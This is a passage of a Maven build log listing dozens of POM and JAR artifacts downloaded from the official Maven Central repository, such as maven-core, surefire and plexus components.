https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-skin-model/1.11.1/doxia-skin-model-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-skin-model/1.11.1/doxia-skin-model-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0-alpha-7/doxia-1.0-alpha-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.0/doxia-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.11.1/doxia-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia/1.12.0/doxia-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-api/3.5.0/enforcer-api-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-api/3.5.0/enforcer-api-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-rules/3.5.0/enforcer-rules-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer-rules/3.5.0/enforcer-rules-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/enforcer/enforcer/3.5.0/enforcer-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.1.1/maven-archiver-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.1.1/maven-archiver-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.6/maven-artifact-manager-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.6/maven-artifact-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.6/maven-core-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.6/maven-error-diagnostics-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.6/maven-model-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/10/maven-parent-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/11/maven-parent-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/15/maven-parent-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/16/maven-parent-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/22/maven-parent-22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/25/maven-parent-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/30/maven-parent-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/31/maven-parent-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/32/maven-parent-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/33/maven-parent-33.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/34/maven-parent-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/35/maven-parent-35.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/37/maven-parent-37.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/39/maven-parent-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/42/maven-parent-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/5/maven-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0/maven-plugin-api-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0.6/maven-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0/maven-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.2.1/maven-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.0/maven-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.8.8/maven-3.8.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-tools/3.5.2/maven-plugin-tools-3.5.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.0/maven-compiler-plugin-3.8.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.0/maven-compiler-plugin-3.8.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-dependency-plugin/3.7.0/maven-dependency-plugin-3.7.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-dependency-plugin/3.7.0/maven-dependency-plugin-3.7.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.5.0/maven-enforcer-plugin-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.5.0/maven-enforcer-plugin-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/maven-metadata.xml +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.0.2/maven-jar-plugin-3.0.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.0.2/maven-jar-plugin-3.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/30/maven-plugins-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/31/maven-plugins-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/32/maven-plugins-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/42/maven-plugins-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.0.2/maven-resources-plugin-3.0.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.0.2/maven-resources-plugin-3.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.1/maven-surefire-plugin-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.1/maven-surefire-plugin-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.1.1/maven-reporting-api-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.1.1/maven-reporting-api-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-impl/3.2.0/maven-reporting-impl-3.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-impl/3.2.0/maven-reporting-impl-3.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting/2.0.6/maven-reporting-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-api/1.4.1/maven-resolver-api-1.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-api/1.4.1/maven-resolver-api-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-util/1.4.1/maven-resolver-util-1.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-util/1.4.1/maven-resolver-util-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver/1.4.1/maven-resolver-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.13.1/maven-artifact-transfer-0.13.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.13.1/maven-artifact-transfer-0.13.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.1.0/maven-common-artifact-filters-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-analyzer/1.14.1/maven-dependency-analyzer-1.14.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-analyzer/1.14.1/maven-dependency-analyzer-1.14.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.3.0/maven-dependency-tree-3.3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.3.0/maven-dependency-tree-3.3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.1.1/maven-filtering-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.1.1/maven-filtering-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/15/maven-shared-components-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/18/maven-shared-components-18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/19/maven-shared-components-19.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/21/maven-shared-components-21.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/30/maven-shared-components-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/33/maven-shared-components-33.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/34/maven-shared-components-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/37/maven-shared-components-37.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/39/maven-shared-components-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/42/maven-shared-components-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/0.1/maven-shared-utils-0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.1/maven-shared-utils-3.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.1/maven-shared-utils-3.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.1.0/maven-shared-utils-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.4/maven-shared-utils-3.3.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.4.2/maven-shared-utils-3.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.4.2/maven-shared-utils-3.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.1/maven-surefire-common-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.1/maven-surefire-common-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.1/surefire-api-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.1/surefire-api-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.1/surefire-booter-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.1/surefire-booter-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.1/surefire-logger-api-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.1/surefire-logger-api-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire/2.22.1/surefire-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.6.2/velocity-1.6.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.7/velocity-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.7/velocity-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/assertj/assertj-bom/3.25.3/assertj-bom-3.25.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-xml/3.0.9/groovy-xml-3.0.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-xml/3.0.9/groovy-xml-3.0.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy/3.0.9/groovy-3.0.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy/3.0.9/groovy-3.0.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/exec-maven-plugin/1.1.1/exec-maven-plugin-1.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/exec-maven-plugin/1.1.1/exec-maven-plugin-1.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/mojo-parent/20/mojo-parent-20.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.3/plexus-archiver-3.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.4/plexus-archiver-3.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.4/plexus-archiver-3.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.9.2/plexus-archiver-4.9.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.9.2/plexus-archiver-4.9.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler/2.8.4/plexus-compiler-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compilers/2.8.4/plexus-compilers-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.4/plexus-component-annotations-1.5.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.1.0/plexus-component-annotations-2.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.12/plexus-components-1.1.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.14/plexus-components-1.1.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.18/plexus-components-1.1.18.pom +Downloaded from central: 